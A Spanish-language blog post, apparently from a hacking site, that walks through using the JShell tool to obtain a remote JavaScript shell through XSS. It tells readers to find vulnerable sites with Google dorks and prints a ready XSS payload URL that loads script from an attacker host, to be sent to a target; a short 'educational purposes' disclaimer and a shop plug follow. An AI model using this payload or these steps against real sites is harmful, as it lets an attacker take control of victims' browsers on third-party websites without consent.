JShell : Obten una shell de Javascript con XSS

0
2214
views

Esta herramienta desarrollada por UltimateHackers  nos permite obtener una shell de Javascript utilizando una web vulnerable a XSS.

Modo de uso

Descargamos JShell desde el repositorio

user@computer:$ git clone https://github.com/UltimateHackers/JShell.git

una vez descargado navegamos hasta esa carpeta, donde descargamos JShell

ejecutamos

user@computer:$ python shell.py

Ahora necesitamos un sitio con una vulnerabilidad XSS que nos permita ejecutar código Javascript. Pueden buscar utilizando algún dork en google.

En mi caso, ya contaba con un sitio con esas características para realizar mis pruebas.

Como puedo saber que sitio puede funcionar?

bueno existen diferentes tipos de XSS, en el caso del sitio que encontre, pueden ver una falla muy simple, cuando cambio el numero en la variable categoría lo ejecuta directamente en sitio. Ahí es donde meteremos nuestro payload.

Ya teniendo el sitio web vulnerable, pasamos a la terminal a configurar el script.

Lo primero que te pregunta es que IP quieres utilizar para la conexion. SI quieres usar la local, solo presiona Enter.

Ahora te pedira el puerto, de igual manera solo presiona Enter. Una vez configurado la IP y el puerto, te va generar un payload el cual vas a poner en la pagina web vulnerable.

Ejemplo

user@computer:$ http://www.sitiovulnereable.com/detalle.php?id=1991&categoria=<svg/onload=setInterval(function({with(document)body.appendChild(createElement("script")).src="//192.168.100.12:33"},100);>

Ahora una vez que pases ese link al objetivo genera una shell de JS, con la cual podrías enviar códigos de Javascript.

user@computer:$ Ejemplo:  alert('visita div security')

Ahora ya solo depende de tu imaginación.

Video

Descarga JShell

 

 

 

 

 

 

 

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop